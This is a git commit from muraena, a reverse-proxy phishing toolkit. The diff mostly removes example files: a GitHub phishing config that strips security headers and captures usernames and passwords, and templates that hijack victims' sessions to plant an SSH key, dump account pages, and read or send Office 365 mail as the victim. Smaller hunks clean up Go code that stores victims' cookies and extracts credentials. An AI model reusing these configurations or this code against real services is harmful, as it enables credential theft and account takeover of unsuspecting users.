Mirror of https://github.com/muraenateam/muraena.git
House cleaning ✨

commit 1cbd95dcea (parent a0853aa16c)
8 changed files with 3 additions and 357 deletions
@@ -1,206 +0,0 @@
[proxy]
# Phishing domain
phishing = "phishing.click"

# Target domain to proxy
destination = "github.com"

# Listening IP address (IPv4 or IPv6)
# e.g. 0.0.0.0 or [::]
IP = "127.0.0.1"

# Listen announces on the local network address.
# The network must be "tcp", "tcp4" or "tcp6"
listener = "tcp4"

# Listening TCP port
port = 443

# Force HTTP to HTTPS redirection
[proxy.HTTPtoHTTPS]
enabled = true
HTTPport = 80


#
# Proxy's replacement rules
#
[transform]

# List of content types to exclude from the transformation process
skipContentType = [ "font/*", "image/*" ]

# Enable transformation rules in base64 strings
[transform.base64]
enabled = false
padding = [ "=", "." ]

[transform.request]
headers = [
    "Cookie",
    "Referer",
    "Origin",
    "X-Forwarded-For"
]

[transform.response]
headers = [
    "Location",
    "WWW-Authenticate",
    "Origin",
    "Set-Cookie",
    "Access-Control-Allow-Origin"
]

# Generic replacement rules:
# these apply to the body and to any HTTP header enabled for manipulation
content = [
    [ "integrity", "intintint" ]
]


#
# Proxy's wiping rules
#
[remove]

[remove.request]
headers = [
    "X-Forwarded-For"
]

[remove.response]
headers = [
    "Content-Security-Policy",
    "Content-Security-Policy-Report-Only",
    "Strict-Transport-Security",
    "X-XSS-Protection",
    "X-Content-Type-Options",
    "X-Frame-Options",
    "Referrer-Policy",
    "X-Forwarded-For"
]

#
# Rudimentary redirection rules
#
[[drop]]
path = "/logout"
redirectTo = "https://github.com"


#
# LOG
#
[log]
enabled = true
filePath = "muraena.log"


#
# TLS
#
[tls]
enabled = true

# Expand replaces the certificate/key/root parameters with the contents of the
# files instead of their file paths
expand = false
certificate = "./cert.pem"
key = "./privkey.pem"
root = "./fullchain.pem"

#
# CRAWLER
#
[crawler]
enabled = false
depth = 3
upto = 20
externalOriginPrefix = "cdn-"
externalOrigins = [
    "*.githubassets.com"
]

#
# NECROBROWSER
#
[necrobrowser]
enabled = true
endpoint = "http://127.0.0.1:3000/instrument"
profile = "./config/instrument.github.necro"

[necrobrowser.keepalive]
# GET on an authenticated endpoint to keep the session alive.
# Every keepalive request is processed as its own necrotask.
enabled = false
minutes = 5 # keep the session alive every 5 minutes


[necrobrowser.trigger]
type = "cookies"
values = ["user_session", "dotcom_user"] # two cookies set by GitHub after successful authentication
delay = 5 # check the victim's cookie jar every 5 seconds to decide whether to start instrumentation


#
# STATIC SERVER
#
[staticServer]
enabled = false
port = 8080
localPath = "./static/"
urlPath = "/evilpath/"


#
# WATCHDOG
#
[watchdog]
enabled = true
# Monitor the rules file for changes and reload it
dynamic = true
rules = "./config/watchdog.rules"
geoDB = "./config/geoDB.mmdb"

#
# TRACKING
#
[tracking]
enabled = true

# The tracking below assumes your phishing URL will look like:
# https://github.com/GithubProfile/aaa-111-bbb (see regex below)
# NOTE: the URL doesn't need to exist, so this is also valid (update identifier accordingly):
# https://github.com/GithubProfileFooBar/aaa-111-bbb
type = "path"

# Tracking identifier
identifier = "_GithubProfile_"

# Rule to generate and validate a tracking identifier
regex = "[a-zA-Z0-9]{3}-[a-zA-Z0-9]{3}-[a-zA-Z0-9]{3}"

# Initial tracking HTTP header (default when empty: If-Range)
header = "X-If-Range"

# Landing HTTP header (default when empty: X-If-Landing-Redirect)
landing = "X-If-Landing-Redirect"

[tracking.urls]
credentials = [ "/session" ]

# no longer needed: this is handled via necrobrowser.trigger
# authSession = [ "/settings/profile" ]

[[tracking.patterns]]
label = "Username"
matching = "login"
start = "login="
end = "&password="

[[tracking.patterns]]
label = "Password"
matching = "password"
start = "password="
end = "&"
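The `[tracking]` section above pairs an `identifier` placeholder with a `regex` that both generates and validates per-victim tokens embedded in the phishing path. As a minimal sketch of what that rule implies (independent of muraena's actual tracker code; all names below are illustrative):

```go
// Sketch only: generate and validate tokens shaped like the
// "[a-zA-Z0-9]{3}-[a-zA-Z0-9]{3}-[a-zA-Z0-9]{3}" rule in the config.
package main

import (
	"crypto/rand"
	"fmt"
	"math/big"
	"regexp"
)

const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

var trackingRe = regexp.MustCompile(`^[a-zA-Z0-9]{3}-[a-zA-Z0-9]{3}-[a-zA-Z0-9]{3}$`)

// newToken builds one aaa-111-bbb style identifier.
func newToken() (string, error) {
	chunks := make([]string, 3)
	for i := range chunks {
		b := make([]byte, 3)
		for j := range b {
			n, err := rand.Int(rand.Reader, big.NewInt(int64(len(alphabet))))
			if err != nil {
				return "", err
			}
			b[j] = alphabet[n.Int64()]
		}
		chunks[i] = string(b)
	}
	return chunks[0] + "-" + chunks[1] + "-" + chunks[2], nil
}

func main() {
	tok, err := newToken()
	if err != nil {
		panic(err)
	}
	// A phishing path would then look like /GithubProfile/<token>,
	// and the same regex validates tokens coming back in requests.
	fmt.Println(tok, trackingRe.MatchString(tok))
}
```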
@@ -1,21 +0,0 @@
{
  "name": "InstrumentGitHub",
  "task": {
    "type": "github",
    "name": [ "PlantAndDump" ],
    "params": {
      "fixSession": "https://github.com/settings/profile",
      "urls": [
        "https://github.com/settings/profile",
        "https://github.com/settings/security-log",
        "https://github.com/settings/emails",
        "https://github.com/settings/repositories"
      ],
      "keywords": ["password", "certificate", "vpn", "credential", "login", "https://", "access", "portal"],
      "sshKey": "ssh-ed25519 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA key@necro",

      "credentials": %%%CREDENTIALS%%%
    }
  },
  "cookies": %%%COOKIES%%%
}
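The `%%%CREDENTIALS%%%` and `%%%COOKIES%%%` markers are template placeholders filled with harvested data before the profile is sent to the `endpoint` configured under `[necrobrowser]`. A rough sketch of that substitution, assuming cookies are serialized from a struct like the `SessionCookie` type shown later in this diff; the function name and flow here are illustrative, not muraena's actual module:

```go
// Illustrative sketch: fill the .necro template placeholders and POST the result.
package main

import (
	"bytes"
	"encoding/json"
	"net/http"
	"strings"
)

type SessionCookie struct {
	Name  string `json:"name"`
	Value string `json:"value"`
}

// instrument replaces the placeholders in the template and sends it to the
// necrobrowser endpoint as JSON.
func instrument(endpoint, template string, cookies []SessionCookie, creds map[string]string) error {
	cookiesJSON, err := json.Marshal(cookies)
	if err != nil {
		return err
	}
	credsJSON, err := json.Marshal(creds)
	if err != nil {
		return err
	}

	body := strings.Replace(template, "%%%COOKIES%%%", string(cookiesJSON), 1)
	body = strings.Replace(body, "%%%CREDENTIALS%%%", string(credsJSON), 1)

	resp, err := http.Post(endpoint, "application/json", bytes.NewBufferString(body))
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	return nil
}

func main() {
	tmpl := `{"cookies": %%%COOKIES%%%, "credentials": %%%CREDENTIALS%%%}`
	_ = instrument("http://127.0.0.1:3000/instrument", tmpl,
		[]SessionCookie{{Name: "user_session", Value: "example"}},
		map[string]string{"Username": "victim", "Password": "hunter2"})
}
```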
@@ -1,7 +0,0 @@
{
  "name": "InstrumentTest",
  "task": {

  },
  "cookies": %%%COOKIES%%%
}
@@ -1,21 +0,0 @@
{
  "name": "dumpEmails",
  "task": {
    "type": "office365",
    "name": [ "OutlookExtrude", "OutlookWriteEmail" ],
    "params": {
      "fixSession": "https://outlook.office.com/mail/inbox",
      "keywords": ["credentials", "microsoft"],

      "writeEmail": {
        "to": "goku.antani@penitenziagite.onmicrosoft.com",
        "subject": "All your sessions are belong to us",
        "data": "NecroBrowser is impersonating this user.\n\nBe ready for mayhem clicking here https://google.com\n\nBye",
        "attachment": "./testing/attachment.png"
      },

      "credentials": %%%CREDENTIALS%%%
    }
  },
  "cookies": %%%COOKIES%%%
}
@@ -326,55 +326,6 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
	// Replacer object
	replacer := muraena.Replacer

	//
	// Garbage ..
	//

	// DROP
	// dropRequest := false
	//
	// TODO: is this still needed? We redirect Requests in the RequestProcessor
	// for _, drop := range sess.Config.Redirects {
	//
	// 	if drop.RedirectTo == "" {
	// 		continue
	// 	}
	//
	// 	// if the drop is empty, it means that we want to drop all the requests
	// 	// and we don't want to redirect them
	// 	if drop.Hostname == "" && drop.Path == "" && drop.Query == "" {
	// 		continue
	// 	}
	//
	// 	if drop.Hostname != "" && response.Request.Host != drop.Hostname {
	// 		continue
	// 	}
	//
	// 	if drop.Path != "" && response.Request.URL.Path != drop.Path {
	// 		continue
	// 	}
	//
	// 	if drop.Query != "" && response.Request.URL.RawQuery != drop.Query {
	// 		continue
	// 	}
	//
	// 	// Invalid HTTP code fallback to 302
	// 	if drop.HTTPStatusCode == 0 {
	// 		drop.HTTPStatusCode = 302
	// 	}
	//
	// 	response.StatusCode = drop.HTTPStatusCode
	// 	response.Header.Set("Location", drop.RedirectTo)
	// 	log.Info("Dropped request %s redirected to: %s", drop.Path, drop.RedirectTo)
	// 	// dropRequest = true
	// 	// break
	// 	return
	// }

	// if dropRequest {
	// 	return
	// }

	// Add extra HTTP headers
	for _, header := range sess.Config.Transform.Response.Add.Headers {
		response.Header.Set(header.Name, header.Value)
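The block removed above was commented-out drop/redirect handling in the response path; the TODO notes that redirects are handled in the RequestProcessor instead. For reference, here is a hedged sketch of what a request-side `[[drop]]` rule (path match, redirect target, 302 fallback) amounts to; the rule struct and middleware are illustrative and not taken from muraena:

```go
// Sketch of request-side handling for a [[drop]] rule such as
// path = "/logout", redirectTo = "https://github.com".
package main

import "net/http"

type DropRule struct {
	Path           string
	RedirectTo     string
	HTTPStatusCode int
}

// dropMiddleware short-circuits matching requests with a redirect before
// they ever reach the upstream proxy handler.
func dropMiddleware(rules []DropRule, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		for _, rule := range rules {
			if rule.RedirectTo == "" || r.URL.Path != rule.Path {
				continue
			}
			code := rule.HTTPStatusCode
			if code == 0 {
				code = http.StatusFound // fall back to 302, as in the removed code
			}
			http.Redirect(w, r, rule.RedirectTo, code)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	rules := []DropRule{{Path: "/logout", RedirectTo: "https://github.com"}}
	http.ListenAndServe("127.0.0.1:8081", dropMiddleware(rules, http.NotFoundHandler()))
}
```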
@@ -427,22 +378,8 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err

				log.Verbose("Set-Cookie: %s", response.Header["Set-Cookie"][k])
			}
		} else if header == "Location" {
			// TODO: Cleanup this mess

			//
			// if len(replacer.SubdomainMap) > 0 {
			// 	for _, m := range replacer.SubdomainMap {
			// 		if strings.Contains(response.Header.Get(header), m[1]) {
			// 			// replace only the first occurrence starting from the left
			// 			response.Header.Set(header, strings.Replace(response.Header.Get(header), m[1], m[0], -1))
			// 			break
			// 		}
			// 	}
			// }

			response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))

			// } else if header == "Location" {
			// 	response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
		} else {
			response.Header.Set(header, replacer.Transform(response.Header.Get(header), false, base64))
		}
@@ -478,7 +415,6 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
		log.Warning("Error: cannot retrieve Victim from tracker: %s", err)
	}

	// victim := muraena.Tracker.TrackResponse(response)
	if victim != nil {
		// before transforming headers like cookies, store the cookies in the CookieJar
		for _, c := range response.Cookies() {
@@ -487,7 +423,6 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
			}

			c.Domain = strings.Replace(c.Domain, ":443", "", -1)

			sessCookie := db.VictimCookie{
				Name:  c.Name,
				Value: c.Value,
@@ -570,22 +505,11 @@ func (muraena *MuraenaProxy) ResponseProcessor(response *http.Response) (err err
	// process body and pack again
	newBody := replacer.Transform(string(responseBuffer), false, base64)

	//
	// Ugly Google patch
	//
	// If the request URL contains AccountsSignInUi/data/batchexecute,
	// then go for another round of patches
	if strings.Contains(response.Request.URL.Path, "AccountsSignInUi/data/batchexecute") {

		// if the body contains the phishing domain
		if strings.Contains(newBody, muraena.Session.Config.Proxy.Phishing) {
			// if the body starts with )]}'\n\n then patch it
			if strings.HasPrefix(newBody, ")]}'\n\n") {

				// fmt.Println("newBody: ", newBody)
				newBody = patchGoogleStructs(newBody)
				// fmt.Println("updated newBody: ", newBody)

			}
		}
	}
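The "Ugly Google patch" branch only fires when the rewritten body still carries the `)]}'` anti-JSON-hijacking prefix that Google's batchexecute responses use. `patchGoogleStructs` itself is not shown in this hunk; as a rough illustration of the general pattern (split off the XSSI guard, fix up the payload, restore the guard), here is a hedged sketch that is not the project's actual implementation:

```go
// Hedged sketch: keep the ")]}'" XSSI guard intact while patching the payload.
// The patch function passed in is a stand-in for the real fix-up.
package main

import (
	"fmt"
	"strings"
)

const xssiPrefix = ")]}'\n\n"

func patchWithPrefix(body string, patch func(string) string) string {
	if !strings.HasPrefix(body, xssiPrefix) {
		return patch(body)
	}
	return xssiPrefix + patch(strings.TrimPrefix(body, xssiPrefix))
}

func main() {
	body := xssiPrefix + `[["wrb.fr","foo","https://phishing.click"]]`
	patched := patchWithPrefix(body, func(s string) string {
		// stand-in for the real payload fix-up
		return strings.ReplaceAll(s, "phishing.click", "github.com")
	})
	fmt.Println(patched)
}
```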
@@ -40,7 +40,7 @@ type Necrobrowser struct {
	RequestTemplate string
}

// Cookies
// SessionCookie structure
type SessionCookie struct {
	Name  string `json:"name"`
	Value string `json:"value"`
@@ -451,15 +451,6 @@ func (module *Tracker) TrackResponse(response *http.Response) (t *Trace) {
		t = module.makeTrace("")

	}
	// else {
	// 	var err error
	// 	victim, err = t.GetVictim(t)
	// 	if err != nil {
	// 		module.Warning("Error: cannot retrieve Victim from tracker: %s", err)
	// 	}
	// }

	// return victim

	return
}
@@ -525,12 +516,7 @@ func (t *Trace) ExtractCredentials(body string, request *http.Request) (found bo
					}
				}
			}

			// if found {
			// 	break
			// }
		}

	}

	if found {
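`ExtractCredentials` walks the `[[tracking.patterns]]` rules from the config (for example `start = "login="`, `end = "&password="`) over the request body. A minimal sketch of that start/end extraction, with type and function names chosen for illustration rather than copied from the module:

```go
// Sketch of extracting a value between a pattern's start and end markers,
// as configured under [[tracking.patterns]]. Illustrative only.
package main

import (
	"fmt"
	"net/url"
	"strings"
)

type Pattern struct {
	Label string
	Start string
	End   string
}

func extract(body string, p Pattern) (string, bool) {
	i := strings.Index(body, p.Start)
	if i < 0 {
		return "", false
	}
	rest := body[i+len(p.Start):]
	j := strings.Index(rest, p.End)
	if j < 0 {
		j = len(rest) // no terminator: take the remainder of the body
	}
	value, err := url.QueryUnescape(rest[:j])
	if err != nil {
		value = rest[:j]
	}
	return value, true
}

func main() {
	body := "login=victim%40example.com&password=hunter2&commit=Sign+in"
	for _, p := range []Pattern{
		{Label: "Username", Start: "login=", End: "&password="},
		{Label: "Password", Start: "password=", End: "&"},
	} {
		if v, ok := extract(body, p); ok {
			fmt.Printf("%s: %s\n", p.Label, v)
		}
	}
}
```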
@@ -595,10 +581,6 @@ func (t *Trace) ExtractCredentialsFromResponseHeaders(response *http.Response) (
				}
			}
		}

		// if found {
		// 	break
		// }
	}

	}
@@ -66,8 +66,3 @@ func (m *SessionModule) Err(error error) {
func (m *SessionModule) Raw(format string, args ...interface{}) {
	log.Raw(m.tag+format, args...)
}

// NO Fatal() here, we want to keep the session alive
// func (m *SessionModule) Fatal(format string, args ...interface{}) {
// 	log.Fatal(m.tag+format, args...)
// }